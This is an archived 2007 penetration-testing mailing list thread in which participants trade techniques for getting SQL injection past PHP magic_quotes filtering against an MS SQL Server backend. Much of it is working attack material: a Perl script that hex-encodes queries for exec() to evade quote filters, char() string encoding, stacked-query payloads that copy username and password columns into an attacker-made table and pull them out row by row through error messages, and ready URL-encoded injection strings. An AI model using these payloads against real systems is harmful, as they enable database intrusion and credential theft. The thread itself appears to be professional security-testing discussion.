Penetration Testing mailing list archives
RE: SQL Injection- Bypassing magic_quotes
From: "Gary Oleary-Steele" <garyo () sec-1 com>
Date: Fri, 12 Oct 2007 09:53:29 +0100
Danux. Ok, bypassing single quotes in your case should not be a problem. You can encode strings in Microsoft SQL in a number of ways. It really depends at this point what your end goal is. Just dealing with WHERE clause bit: As far as I can see your only encoding ' as %27. If that's all you have to do to get around ' characters then I can modify my tool if it doesn't do it already with 1 line of code (if this is the case then you're dealing with a very very basic and broken filter, prob not magic quotes). $query = s/'/%27/g; But if I've missed the point because I haven't read the thread (sorry im stacked out) then you can also encode strings in this format; [Normal Version] Select username from users WHERE username ='hello'; [Encoded version] Select username from users WHERE username = char(0x68) + char(0x65) + char(0x6c) + char(0x6c) + char(0x6f) + char(0x31) (remember when submitting this to the webserver to encode + as %2b) Taking that one stage further, if you want to encode the entire SQL query to remove quotes you could use this short perl script; # Script to bypass php magic quotes print "Enter SQL query to encode:"; $teststr=<STDIN>;chomp $teststr; $hardcoded_sql = 'declare @q varchar(8000) '. 'select @q=0x*** '. 'exec(@q)'; $prepared = encode_sql($teststr); $hardcoded_sql =~s/\*\*\*/$prepared/g; print "\n[*]-Encoded SQL:\n\n"; print $hardcoded_sql ."\n"; sub encode_sql{ #Sub to encode SQL @subvar=@_; my $sqlstr =$subvar[0]; @ASCII = unpack("C*", $sqlstr); foreach $line (@ASCII) { $encoded = sprintf('%lx',$line); $encoded_command .= $encoded; } return $encoded_command; } Personally I tackle these problems in a number of ways. However, if you want to take the entire table then this is one idea. A problem you often come across is indexing a table, i.e. finding a value you can increment to cycle through the values in the table. In a recent pen test I had a number of issues with data types so I decided to create my own table with an identity column. The identity column just creates a sequential int value for each row in the table. For example, lets say I have a table called users. I want to extract all the values from the username and password columns. The first thing I would do is create my own table to store the results, my table has an extra identity column. I then use this to identify each row. [Step 1] Create your table: '; create table Danux(username varchar(50),password varchar(50), id int identity(1,1))-- [Step 2] insert the data into your table; '; insert into Danux select username,password from users-- [Step 3] extract the data out of you own table based on the id column: ' or 1 in (select username from Danux where id=1);-- ' or 1 in (select username from Danux where id=2);-- ' or 1 in (select username from Danux where id=3);-- Note: if you want both values do ' or 1 in (select username%2b%3a%2bpassword from Danux where id=1);-- (url encoded of course) If you see the usernames or whatever in the error messages then your away... Sorry I've had no time to read the complete thread. Let me know how you get on. Thanks Gary Oleary-Steele Sec-1 Ltd p.s. if you don't have permission to create a table try create a temp table by prefixing ## to you table name. -----Original Message----- From: listbounce () securityfocus com [mailto:listbounce () securityfocus com] On Behalf Of Danux Sent: 11 October 2007 18:32 To: Gary Oleary-Steele; pen-test () securityfocus com Subject: Re: SQL Injection- Bypassing magic_quotes Excellent Gary, the SQL Version was printed, Because i was trying to execute: ' union select @@version,1,1,1-- (url encoded obviously). But without success..!! Well, let me check your excellent tool and thanks for that, but i think the problem and issue of the thread is about single quotes so, if i try to use the WHERE CLAUSE it will be filtered by the PHP app. On 10/11/07, Gary Oleary-Steele <garyo () sec-1 com> wrote:
Sorry, I haven't read the thread. However If you want to extract data from a table I use the following syntax. %27or%201%20in%20(SQL HERE)-- Note: I actually use more complex syntax to get round some data type issues. Don't terminate the query (i.e. don't use semi colons) and you most probably wont be able to select more than one result at a time. You could try my script to do it for you; Http://www.sec-1labs.co.uk/tools/sasi.zip Or try something like bobcat or one of the other SQL injection tools
out
there. To see if its going to work, try this http://www.site.com/mod.php?id=1%27%20or%201%20in%20(@@Version)-- If that displays the SQL server version within the error then you
should
be away. But your going to need to select each row and column at a time. For example if you were going for a table called users and that table had
a
username and password column. You could do;
http://www.site.com/mod.php?id=1%27%20or%201%20in%20(select%20top%201%20
username%2b%27%20%27%2bpassword%20from%20users)-- Then you would need to use are where clause to move down the table. Sorry if I've missed something, I haven't read the thread (in a rush) Thanks Gary -----Original Message----- From: listbounce () securityfocus com
[mailto:listbounce () securityfocus com]
On Behalf Of Danux Sent: 11 October 2007 02:00 To: pen-test () securityfocus com Subject: Re: SQL Injection- Bypassing magic_quotes Good Leo, but sadly i have already taken those steps, the backend is a SQL Server 2005 so xp_cmdshell and others are disabled. I only want to print a confidential table in order to show up that its important to fix it. I think, the MSSQL connection handler is executed by the first mod.php query so when trying to execute the second one it says the handlers is already used, so ... i need a way to execute a second query through the first one... with union or something like that or as Geoff said, a way to stop executing the first query(mod.php) so that the connection handler is not used and can execute the second one of mine (sql injection). What you think? On 10/10/07, Walsh, Leo <Leo_Walsh () jeffersonwells com> wrote:I would try a couple of things, if you haven't already. 1) If you aren't actually interested in the results that are
obtained
from the query performed by mod.php then skip it. Your 1=1 selection criteria might be eating up too much time. From the looks of yourquerystring it seems that can you bypass whatever filtering they are
doing
without using 1=1. 2) Try selecting something much smaller than the entire messagestable.This is a table that might be quite large. Try selecting a single
row
ormessage where date > somedate (which you may have to convert to abinaryvalue, by the way. If you know another table name then try that. 3) Try using a SQL Injection tool to gain sa access. Depending on
the
purpose of your investigation gaining sa should be enough todemonstratea severe vulnerability that should be mitigated immediately. -Leo Walsh, GSNA Jefferson Wells International 816-627-4222 (office) 913-484-8051 (cell) -----Original Message----- From: listbounce () securityfocus com[mailto:listbounce () securityfocus com]On Behalf Of Danux Sent: Tuesday, October 09, 2007 7:25 PM To: pen-test () securityfocus com Subject: Re: SQL Injection- Bypassing magic_quotes Hi, well, after taking some examples from you (thanks in advance), iamable to bypass single quotes son i can inject something simple as: http://www.site.com/mod.php?id=1%27%20or%201=1-- But now, when trying to print a full table.... with the following injection...:
http://www.site.com/mod.php?id=1%27%20or%201=1--;select%20*%20from%20mes
sages;-- there is a Warning saying that the Connecction is busy: Warning: odbc_exec() [function.odbc-exec]: SQL error:
[Microsoft][ODBC
SQL Server Driver]Connection is busy with results for another hstmt,SQLstate S1000 in SQLExecDirect in .........mod.php So, i think i need a way to execute the second query (mine) before
the
one that mod.php executes by itself (mod.php?id=1) What you think?
------------------------------------------------------------------------
This list is sponsored by: Cenzic Need to secure your web apps NOW? Cenzic finds more, "real" vulnerabilities fast. Click to try it, buy it or download a solution FREE today! http://www.cenzic.com/downloads
------------------------------------------------------------------------
******* Internet Email Confidentiality ******* The information contained in this message may be privileged and confidential and protected from disclosure. If the reader of this message is not the intended recipient, or an employee or agent responsible for delivering this message to the intended recipient, you are hereby notified that it is strictly prohibited (a) to disseminate, distribute or copy this communication or any of the information contained in it, or (b) to take any action based on the information in it. If you have received this communication in error, please notify us immediately by replying to the message and deleting it from your computer.-- Danux, CISSP Chief Information Security Officer Macula Security Consulting Group www.macula-group.com
------------------------------------------------------------------------
This list is sponsored by: Cenzic Need to secure your web apps NOW? Cenzic finds more, "real" vulnerabilities fast. Click to try it, buy it or download a solution FREE today! http://www.cenzic.com/downloads
------------------------------------------------------------------------
Sec-1 specialises in the provision of network security solutions. For more information on products and services we offer visit www.sec-1.com or call 0113 257 8955.
-- Danux, CISSP Chief Information Security Officer Macula Security Consulting Group www.macula-group.com ------------------------------------------------------------------------ This list is sponsored by: Cenzic Need to secure your web apps NOW? Cenzic finds more, "real" vulnerabilities fast. Click to try it, buy it or download a solution FREE today! http://www.cenzic.com/downloads ------------------------------------------------------------------------ Sec-1 specialises in the provision of network security solutions. For more information on products and services we offer visit www.sec-1.com or call 0113 257 8955. ------------------------------------------------------------------------ This list is sponsored by: Cenzic Need to secure your web apps NOW? Cenzic finds more, "real" vulnerabilities fast. Click to try it, buy it or download a solution FREE today! http://www.cenzic.com/downloads ------------------------------------------------------------------------
Current thread:
- SQL Injection- Bypassing magic_quotes Danux (Oct 03)
- Message not available
- Re: SQL Injection- Bypassing magic_quotes Danux (Oct 09)
- Message not available
- <Possible follow-ups>
- RE: SQL Injection- Bypassing magic_quotes Andrew Court (Oct 04)
- Re: SQL Injection- Bypassing magic_quotes Jorge Hoya (Oct 05)
- Re: SQL Injection- Bypassing magic_quotes Danux (Oct 09)
- Re: SQL Injection- Bypassing magic_quotes Jorge Hoya (Oct 05)
- Re: SQL Injection- Bypassing magic_quotes Danux (Oct 10)
- RE: SQL Injection- Bypassing magic_quotes Walsh, Leo (Oct 11)
- Re: SQL Injection- Bypassing magic_quotes Danux (Oct 11)
- RE: SQL Injection- Bypassing magic_quotes Gary Oleary-Steele (Oct 12)